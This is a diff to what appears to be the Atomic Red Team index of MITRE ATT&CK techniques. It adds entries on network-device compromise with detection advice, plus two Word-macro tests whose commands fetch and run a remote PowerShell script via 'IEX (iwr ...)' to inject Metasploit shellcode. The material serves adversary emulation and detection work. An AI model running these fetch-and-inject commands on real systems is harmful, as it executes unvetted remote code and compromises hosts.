+ that traverse a network boundary device can make monitoring data transmissions
+ more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ to change the operating system of a network device, implementing their own
+ custom NAT mechanisms to further obscure their activities"
+ name: Network Address Translation Traversal
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1599.001
+ url: https://attack.mitre.org/techniques/T1599/001
+ - source_name: RFC1918
+ url: https://tools.ietf.org/html/rfc1918
+ description: IETF Network Working Group. (1996, February). Address Allocation
+ for Private Internets. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_detection: |-
+ Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.
+
+ Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1599:
+ technique:
+ created: '2020-10-19T16:08:29.817Z'
+ modified: '2020-10-21T01:45:59.246Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166
+ description: |-
+ Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
+
+ Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
+
+ When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
+ name: Network Boundary Bridging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1599
+ url: https://attack.mitre.org/techniques/T1599
+ x_mitre_platforms:
+ - Network
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_detection: |-
+ Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
+
+ Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.
+ x_mitre_defense_bypassed:
+ - Router ACL
+ - Firewall
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1556.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1556.004
+ url: https://attack.mitre.org/techniques/T1556/004
+ - source_name: FireEye - Synful Knock
+ url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html
+ description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
+
+ [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)
+ name: Network Device Authentication
+ id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T02:41:11.550Z'
+ created: '2020-10-19T17:58:04.155Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1070.005:
technique:
external_references:
@@ -30570,7 +34648,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:14:08.350Z'
+ modified: '2020-09-16T19:24:20.601Z'
created: '2017-05-31T21:30:32.662Z'
x_mitre_is_subtechnique: false
x_mitre_version: '1.1'
@@ -31405,64 +35483,168 @@ defense-evasion:
Restart-Computer -Confirm
name: powershell
elevation_required: true
+ T1601.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1601.001
+ url: https://attack.mitre.org/techniques/T1601/001
+ - source_name: Killing the myth of Cisco IOS rootkits
+ url: https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf
+ description: Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco
+ IOS rootkits. Retrieved October 20, 2020.
+ - source_name: Killing IOS diversity myth
+ url: https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf
+ description: 'Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August).
+ Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode
+ design. Retrieved October 20, 2020.'
+ - source_name: Cisco IOS Shellcode
+ url: http://2015.zeronights.org/assets/files/05-Nosenko.pdf
+ description: 'George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved
+ October 21, 2020.'
+ - source_name: Cisco IOS Forensics Developments
+ url: https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf
+ description: Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS
+ Forensics. Retrieved October 21, 2020.
+ - source_name: Juniper Netscreen of the Dead
+ url: https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf
+ description: Graeme Neilson . (2009, August). Juniper Netscreen of the Dead.
+ Retrieved October 20, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Patch System Image
+ description: "Adversaries may modify the operating system of a network device
+ to introduce new capabilities or weaken existing defenses.(Citation: Killing
+ the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation:
+ Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation:
+ Juniper Netscreen of the Dead) Some network devices are built with a monolithic
+ architecture, where the entire operating system and most of the functionality
+ of the device is contained within a single file. Adversaries may change this
+ file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo
+ change the operating system in storage, the adversary will typically use the
+ standard procedures available to device operators. This may involve downloading
+ a new file via typical protocols used on network devices, such as TFTP, FTP,
+ SCP, or a console connection. The original file may be overwritten, or a
+ new file may be written alongside of it and the device reconfigured to boot
+ to the compromised image.\n\nTo change the operating system in memory, the
+ adversary typically can use one of two methods. In the first, the adversary
+ would make use of native debug commands in the original, unaltered running
+ operating system that allow them to directly modify the relevant memory addresses
+ containing the running operating system. This method typically requires administrative
+ level access to the device.\n\nIn the second method for changing the operating
+ system in memory, the adversary would make use of the boot loader. The boot
+ loader is the first piece of software that loads when the device starts that,
+ in turn, will launch the operating system. Adversaries may use malicious
+ code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004)
+ method, to directly manipulate running operating system code in memory. This
+ malicious code in the bootloader provides the capability of direct memory
+ manipulation to the adversary, allowing them to patch the live operating system
+ during runtime.\n\nBy modifying the instructions stored in the system image
+ file, adversaries may either weaken existing defenses or provision new capabilities
+ that the device did not have before. Examples of existing defenses that can
+ be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600),
+ authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004),
+ and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).
+ \ Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001),
+ [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port
+ Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may
+ also compromise existing commands in the operating system to produce false
+ output to mislead defenders. When this method is used in conjunction with
+ [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one
+ example of a compromised system command may include changing the output of
+ the command that shows the version of the currently running operating system.
+ \ By patching the operating system, the adversary can change this command
+ to instead display the original, higher revision number that they replaced
+ through the system downgrade. \n\nWhen the operating system is patched in
+ storage, this can be achieved in either the resident storage (typically a
+ form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).
+ \n\nWhen the technique is performed on the running operating system in memory
+ and not on the stored copy, this technique will not survive across reboots.
+ \ However, live memory modification of the operating system can be combined
+ with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve
+ persistence. "
+ id: attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-22T17:50:46.560Z'
+ created: '2020-10-19T19:49:24.129Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
+
+ Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device configuration
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1574.007:
technique:
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ created: '2020-03-13T14:10:43.424Z'
+ modified: '2020-09-16T16:56:34.583Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.007
+ url: https://attack.mitre.org/techniques/T1574/007
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-38
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/38.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by PATH Environment Variable
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- name: Path Interception by PATH Environment Variable
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1574.007
- url: https://attack.mitre.org/techniques/T1574/007
- - external_id: CAPEC-capec
- source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:02:40.983Z'
- created: '2020-03-13T14:10:43.424Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.008:
technique:
- created: '2020-03-13T17:48:58.999Z'
- modified: '2020-03-26T20:03:27.496Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -31480,9 +35662,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.008
url: https://attack.mitre.org/techniques/T1574/008
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-159
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/159.html
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
@@ -31498,6 +35680,16 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:03:35.217Z'
+ created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -31522,23 +35714,13 @@ defense-evasion:
atomic_tests: []
T1574.009:
technique:
- created: '2020-03-13T13:51:58.519Z'
- modified: '2020-03-26T19:55:39.867Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
url: https://attack.mitre.org/techniques/T1574/009
- - external_id: CAPEC-capec
+ - external_id: CAPEC-38
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/38.html
- source_name: Microsoft CurrentControlSet Services
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
@@ -31566,7 +35748,17 @@ defense-evasion:
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- x_mitre_version: '1.0'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:05:23.755Z'
+ created: '2020-03-13T13:51:58.519Z'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -31701,9 +35893,9 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:23:25.002Z'
+ modified: '2020-10-21T01:26:31.804Z'
created: '2020-07-01T18:23:25.002Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -31716,6 +35908,7 @@ defense-evasion:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1055.002:
technique:
@@ -31808,11 +36001,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-05-19T21:22:38.174Z'
+ modified: '2020-10-22T16:35:54.740Z'
created: '2019-11-13T14:44:49.439Z'
x_mitre_platforms:
- Linux
- Windows
+ - Network
x_mitre_data_sources:
- VBR
- MBR
@@ -31829,7 +36023,7 @@ defense-evasion:
- Anti-virus
- Host intrusion prevention systems
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
@@ -32112,6 +36306,39 @@ defense-evasion:
'
name: powershell
+ - name: RunPE via VBA
+ auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
+ description: 'This module executes calc.exe from within the WINWORD.EXE process
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
+ name: powershell
T1055:
technique:
id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
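Review bot: The prereq_command's `Stop-Process -Name $process` (and `Stop-Process -Name "winword"` in the T1055 "Shellcode execution via VBA" test below) terminates every running instance of the Office product, not just the COM instance the check itself started, so a user's open documents are killed without warning; keeping the COM object and calling `$app.Quit()` would release only the check's own instance. The executor also fetches Invoke-MalDoc.ps1 from the `master` branch of a remote repository and pipes it straight into `IEX` with no pinned revision or hash, so whatever that branch holds at run time executes on the host; referencing a fixed commit, or the copy of the helper that the URL suggests ships with the invoke-atomicredteam module, would make the test reproducible and reviewable. Minor: `Invoke-MalDoc` here and `Invoke-Maldoc` in the T1055 test spell the same cmdlet two ways; pick one.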
@@ -32249,6 +36476,37 @@ defense-evasion:
mavinject $mypid /INJECTRUNNING #{dll_payload}
name: powershell
elevation_required: true
+ - name: Shellcode execution via VBA
+ auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
+ description: |
+ This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+ with Metasploit, for use on x86-64 Windows 10 machines.
+
+ Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+ is required.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The 64-bit version of Microsoft Office must be installed
+
+'
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+ name: powershell
T1055.008:
technique:
external_references:
@@ -32394,6 +36652,98 @@ defense-evasion:
'
name: command_prompt
+ T1542.004:
+ technique:
+ created: '2020-10-20T00:05:48.790Z'
+ modified: '2020-10-22T02:18:19.568Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc
+ description: |-
+ Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
+
+
+ ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.
+ name: ROMMONkit
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.004
+ url: https://attack.mitre.org/techniques/T1542/004
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: There are no documented means for defenders to validate the
+ operation of the ROMMON outside of vendor support. If a network device is
+ suspected of being compromised, contact the vendor to assist in further investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_data_sources:
+ - File monitoring
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ atomic_tests: []
+ T1600.001:
+ technique:
+ id: attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8
+ description: |-
+ Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
+
+ Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
+
+ Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)
+ name: Reduce Key Space
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1600.001
+ url: https://attack.mitre.org/techniques/T1600/001
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T22:36:22.369Z'
+ created: '2020-10-19T19:03:48.310Z'
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ x_mitre_detection: There is no documented method for defenders to directly identify
+ behaviors that reduce encryption key space. Detection efforts may be focused
+ on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some
+ detection methods require vendor support to aid in investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1108:
technique:
object_marking_refs:
@@ -33983,9 +38333,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.010
url: https://attack.mitre.org/techniques/T1574/010
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-17
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/17.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -34003,7 +38353,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:37:28.912Z'
+ modified: '2020-09-16T19:10:04.262Z'
created: '2020-03-12T20:43:53.998Z'
x_mitre_contributors:
- Travis Smith, Tripwire
@@ -34038,9 +38388,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.011
url: https://attack.mitre.org/techniques/T1574/011
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-478
source_name: capec
